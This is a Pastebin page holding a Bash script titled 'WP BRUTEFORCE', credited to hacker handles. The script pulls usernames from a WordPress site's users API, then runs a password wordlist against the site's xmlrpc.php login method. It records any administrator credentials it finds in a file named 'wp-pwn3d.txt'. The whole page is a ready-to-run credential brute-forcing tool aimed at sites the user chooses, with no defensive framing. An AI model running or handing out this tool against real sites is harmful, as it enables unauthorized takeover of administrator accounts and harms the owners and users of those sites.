Advertisement
Walker404

[BASH] WP BRUTEFORCE

Apr 12th, 2019
879
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.88 KB | None | 0 0
  1. #!/bin/bash
  2. #COPYRIGHT LeakC0de & NTB4WORLD
  3. #CODED BY MinorityCode_
  4. #Thanks to Eka Syahwan ( PHP SVScanner )
  5.  
  6. #COLOR
  7. BGNVAVY="\033[1;46m"
  8. BGYELLOW="\033[1;43m"
  9. BGGREEN="\e[1;42m"
  10. BGRED="\e[1;41m"
  11. RED="\e[31m"
  12. GREEN="\e[32m"
  13. YELLOW="\e[33m"
  14. NOCOLOR="\e[0m"
  15. PUTIH='\033[1;37m'
  16.  
  17. #CODE
  18. header () {
  19. printf "${RED}
  20. ▄▄▌ ▄▄▄ . ▄▄▄· ▄ •▄ ▄▄· ·▄▄▄▄ ▄▄▄ .
  21. ██• ▀▄.▀·▐█ ▀█ █▌▄▌▪▐█ ▌▪▪ ██▪ ██ ▀▄.▀·
  22. ██▪ ▐▀▀▪▄▄█▀▀█ ▐▀▀▄·██ ▄▄ ▄█▀▄ ▐█· ▐█▌▐▀▀▪▄
  23. ▐█▌▐▌▐█▄▄▌▐█ ▪▐▌▐█.█▌▐███▌▐█▌.▐▌██. ██ ▐█▄▄▌
  24. .▀▀▀ ▀▀▀ ▀ ▀ ·▀ ▀·▀▀▀ ▀█▄▀▪▀▀▀▀▀• ▀▀▀
  25. ${RED}------------------------------------${NOCOLOR}
  26. CODED BY NTB4WORLD
  27. ${RED}------------------------------------${NOCOLOR}
  28. "
  29. }
  30. header
  31. echo "1. Use Username from getUsername"
  32. echo "2. Use Custom Username"
  33. read -p "Choose Mode : " mode;
  34. if [[ $mode -eq 1 ]]; then
  35. clear
  36. header
  37. getUsername(){
  38. getUser=$( curl -s "${url}/wp-json/wp/v2/users" )
  39. UserName=$( echo $getUser | grep -Po '(?<=slug":")[^"]*' | tail -1)
  40. # echo $UserName
  41. }
  42.  
  43. echo -n "Masukkan URL : "
  44. read url
  45. echo "[x] Getting Username... Please Wait..."
  46. getUsername
  47. BForce(){
  48. brute=$( curl -s "${url}/xmlrpc.php" --data "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>${UserName}</value></param><param><value>${1}</value></param></params></methodCall>")
  49. grep=$( echo $brute | grep -Po '(?<=<member><name>isAdmin<\/name><value><boolean>).*?(?=</)' )
  50. site=$( echo $brute | grep -Po '(?<=<member><name>url<\/name><value><string>).*?(?=</)' )
  51. title=$( echo $brute | grep -Po '(?<=<member><name>blogName<\/name><value><string>).*?(?=</)' )
  52. printf "[!] ${NOCOLOR}${BGYELLOW}${1}${NOCOLOR} | "
  53. if [[ $grep == '1' ]]; then
  54. # echo $brute
  55. printf "RESP : ${BGGREEN}SUCCESS!!!${NOCOLOR}\n"
  56. printf "INFO : USERNAME : ${BGGREEN}$UserName${NOCOLOR} | PASSWORD : ${BGGREEN}${1}${NOCOLOR} | TITLE : ${BGGREEN}${title}${NOCOLOR} | SITE : ${BGGREEN}${site}${NOCOLOR} \n"
  57. echo "INFO : USERNAME : $UserName | PASSWORD : ${1} | TITLE : ${title} | SITE : ${site}" >> wp-pwn3d.txt
  58. exit
  59. else
  60. printf "RESP : ${BGRED}Gagal!!!${NOCOLOR} \n"
  61. fi
  62.  
  63. }
  64. printf "[!] Username : ${BGNVAVY}$UserName${NOCOLOR} \n"
  65. printf "[x] Tryng to BruteForce with Username [ ${BGNVAVY}$UserName${NOCOLOR} ] \n"
  66. echo ""
  67. echo "List In This Directory :"
  68. echo "+====================================================+"
  69. ls
  70. echo "+====================================================+"
  71. echo -n "Put Your Pwd List : "
  72. read list
  73. echo ""
  74. if [ ! -f $list ]; then
  75. echo "[404] $list No Such File in Directory"
  76. exit
  77. fi
  78. IFS=$'\r\n' GLOBIGNORE='*' command eval 'pwdlist=($(cat $list))'
  79. for (( i = 0; i < "${#pwdlist[@]}"; i++ )); do
  80. pwdlist="${pwdlist[$i]}"
  81. BForce $pwdlist
  82. done
  83. elif [[ $mode -eq 2 ]]; then
  84. clear
  85. header
  86. BForce(){
  87. brute=$( curl -s "${url}/xmlrpc.php" --data "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>${UserName}</value></param><param><value>${1}</value></param></params></methodCall>")
  88. grep=$( echo $brute | grep -Po '(?<=<member><name>isAdmin<\/name><value><boolean>).*?(?=</)' )
  89. site=$( echo $brute | grep -Po '(?<=<member><name>url<\/name><value><string>).*?(?=</)' )
  90. title=$( echo $brute | grep -Po '(?<=<member><name>blogName<\/name><value><string>).*?(?=</)' )
  91. printf "[!] ${NOCOLOR} : ${BGYELLOW}${1}${NOCOLOR} | "
  92. if [[ $grep == '1' ]]; then
  93. printf "RESP : ${BGGREEN}SUCCESS!!!${NOCOLOR}\n"
  94. printf "INFO : USERNAME : ${BGGREEN}$UserName${NOCOLOR} | PASSWORD : ${BGGREEN}${1}${NOCOLOR} | TITLE : ${BGGREEN}${title}${NOCOLOR} | SITE : ${BGGREEN}${site}${NOCOLOR}\n"
  95. echo "INFO : USERNAME : $UserName | PASSWORD : ${1} | TITLE : ${title} | SITE : ${site}" >> wp-pwn3d.txt
  96. exit
  97. else
  98. printf "RESP : ${BGRED}Gagal!!!${NOCOLOR} \n"
  99. fi
  100.  
  101. }
  102. echo -n "Masukkan URL : "; read url
  103. echo -n "Masukkan Username : "; read UserName
  104. printf "[!] Username : ${BGNVAVY}$UserName${NOCOLOR} \n"
  105. printf "[x] Tryng to BruteForce with Username [ ${BGNVAVY}$UserName${NOCOLOR} ] \n"
  106. echo ""
  107. echo "List In This Directory :"
  108. echo "+====================================================+"
  109. ls
  110. echo "+====================================================+"
  111. echo -n "Put Your Pwd List : "
  112. read list
  113. echo ""
  114. if [ ! -f $list ]; then
  115. echo "[404] $list No Such File in Directory"
  116. exit
  117. fi
  118. IFS=$'\r\n' GLOBIGNORE='*' command eval 'pwdlist=($(cat $list))'
  119. for (( i = 0; i < "${#pwdlist[@]}"; i++ )); do
  120. pwdlist="${pwdlist[$i]}"
  121. BForce $pwdlist
  122. done
  123. fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement